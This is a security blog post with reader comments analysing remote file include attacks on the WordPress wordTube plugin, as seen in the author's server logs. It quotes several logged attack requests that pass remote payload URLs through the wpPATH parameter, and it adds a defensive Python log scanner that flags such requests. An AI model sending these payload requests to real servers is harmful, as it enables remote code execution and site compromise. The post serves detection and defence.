Blog Under Siege

WordPress wordTube <= 1.43 is listed on BlogSecurity's dangerous WordPress software list, "BlogWatch". This WordPress plugin has a remote file include vulnerability: an attacker can execute commands on a vulnerable WordPress server by passing, in a URL parameter, the address of a malicious file hosted on a remote server under the attacker's control.

An attacker attempted to exploit this vulnerability on BlogSecurity today, and I thought it would be educational to show what the attacker tried.

The attack looks as follows:

212.227.90.165 - - [03/Jul/2007:08:34:37 -0600] "GET /category/wordpress//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pc-users.de/images/avatar/up.txt? HTTP/1.1" 404 6099 "-" "libwww-perl/5.803"
212.227.90.165 - - [03/Jul/2007:08:34:38 -0600] "GET /category/wordpress//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pc-users.de/images/avatar/up.txt? HTTP/1.1" 404 6099 "-" "libwww-perl/5.803"
74.200.206.130 - - [03/Jul/2007:10:14:54 -0600] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.ws-usa.com/uni/error.txt? HTTP/1.1" 404 6093 "-" "libwww-perl/5.805"
74.200.206.130 - - [03/Jul/2007:10:55:16 -0600] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.ws-usa.com/uni/error.txt? HTTP/1.1" 404 6099 "-" "libwww-perl/5.805"

We see the attacker is making requests from '212.227.90.165' (Schlund + Partner AG) and '74.200.206.130' (FastServers, Inc.), and that they either own or, more likely, have compromised 'www.pc-users.de' and 'www.ws-usa.com'.

As you can see above, the attacker is trying to "include" a malicious text file full of bad requests via wordtube/wordtube-button.php. The web server responds with a 404 error message because these files don't exist here. What's interesting is that the BlogWatch feed, '/category/wordpress/blogwatch/feed', included the vulnerable version tag wordTube <= 1.43. That alone may have been enough to set an automated attack program on our scent like a bloodhound, mistakenly concluding that BlogSecurity is actually running a vulnerable version of wordTube.
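The requests above are easy to pick out of a web server log once you know their shape: a PHP script being handed a query parameter whose value is itself a full URL on another host. The following is an added example, not code from the original post, that parses Apache combined-format log lines and flags exactly that pattern, reporting the source address, the targeted script and the remote host the payload was to be fetched from. The first two sample lines are the post's own entries rejoined onto single lines; the last two are constructed (a local path traversal attempt and a benign search containing a URL) to show what the check does not report.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format, which is what the entries quoted in the post use:
# host ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# URL schemes PHP's include() will fetch over the network when allow_url_include is on.
REMOTE_SCHEMES = {"http", "https", "ftp"}

# Constructed sample log. Lines 1-2 are the post's entries rejoined onto one line each;
# lines 3-4 are made up (RFC 5737 addresses) to exercise the non-matching cases.
SAMPLE_LOG = """\
212.227.90.165 - - [03/Jul/2007:08:34:37 -0600] "GET /category/wordpress//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pc-users.de/images/avatar/up.txt? HTTP/1.1" 404 6099 "-" "libwww-perl/5.803"
74.200.206.130 - - [03/Jul/2007:10:14:54 -0600] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.ws-usa.com/uni/error.txt? HTTP/1.1" 404 6093 "-" "libwww-perl/5.805"
198.51.100.7 - - [03/Jul/2007:11:02:09 -0600] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=../../wp-config.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Jul/2007:11:05:41 -0600] "GET /?s=http://example.org/ HTTP/1.1" 200 9123 "http://example.org/" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so that "param=" still appears as a parameter
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def remote_include_attempts(log_text):
    """One finding per query parameter that hands a full remote URL to a PHP script.

    Local paths (traversal) and URLs passed to non-PHP targets such as a search
    form are deliberately not reported; this check is specific to remote includes.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].lower().endswith(".php"):
            continue
        for name, value in rec["params"]:
            v = urlsplit(value)
            if v.scheme.lower() in REMOTE_SCHEMES and v.netloc:
                findings.append({
                    "source_ip": rec["ip"],
                    "script": rec["path"].rsplit("/", 1)[-1],
                    "param": name,
                    "remote_host": v.netloc,
                    # A trailing "?" turns whatever the script appends to the
                    # include path into a query string on the remote fetch,
                    # a common tell of an RFI payload (seen in the post's log).
                    "trailing_query_mark": value.endswith("?"),
                    "status": int(rec["status"]),
                    "agent": rec["agent"],
                })
    return findings


def hosts_by_source(findings):
    """Group the remote payload hosts by the address that requested them."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["source_ip"], set()).add(f["remote_host"])
    return {ip: sorted(hosts) for ip, hosts in grouped.items()}


if __name__ == "__main__":
    found = remote_include_attempts(SAMPLE_LOG)
    for f in found:
        print(f"{f['source_ip']} -> {f['script']}?{f['param']}= "
              f"fetch from {f['remote_host']} (HTTP {f['status']}, {f['agent']})")
    print(hosts_by_source(found))
```

A 404 in the findings, as in the post's case, means the plugin was not present and the request failed; a 200 against a site that does run the plugin is the line worth escalating, and the grouping by source address is what you would hand to the hosting providers when reporting the abuse.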

My assumption is that the attacker(s) here have two programs: the first locates and detects what it takes to be our vulnerable WordPress plugin, and the second launches the attack. At some point the attacker will log in to these servers to see what fruit they have plucked from the vine.

Many times I have heard users tell me that they don't care if their blog gets hacked! To those individuals, may I leave you with a thought: the servers listed above that are attacking me today may be yours! By doing nothing, you may be inadvertently supporting the attackers.

I have contacted the providers regarding these attacks.

Comments

It must be hack wordtube day... look what I found :(

75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
66.230.197.155 - - [03/Jul/2007:04:05:13 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4586 "-" "libwww-perl/5.805"
66.230.197.155 - - [03/Jul/2007:04:05:14 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
204.15.10.144 - - [03/Jul/2007:04:07:18 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.securityjobs.us/xpl/meks.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.79"

Luckily I don't have wordtube installed :)

Oops, sorry, looks like the [code] tag doesn't wrap properly.

Nick, fixed :)

To be honest, I think this is one of the more popular WordPress exploits, I have seen it in my logs before.

Another reason why mod_security is so sexy running alongside code which has been developed with security last in the process. When will these people learn about SDLC?

Daniel, mod_security can be really useful if the user knows how to set it up and assuming their blog is not hosted.

Daniel,

I hope you do not believe that mod_security protects you against attacks. It just protects you against the dumb worms…
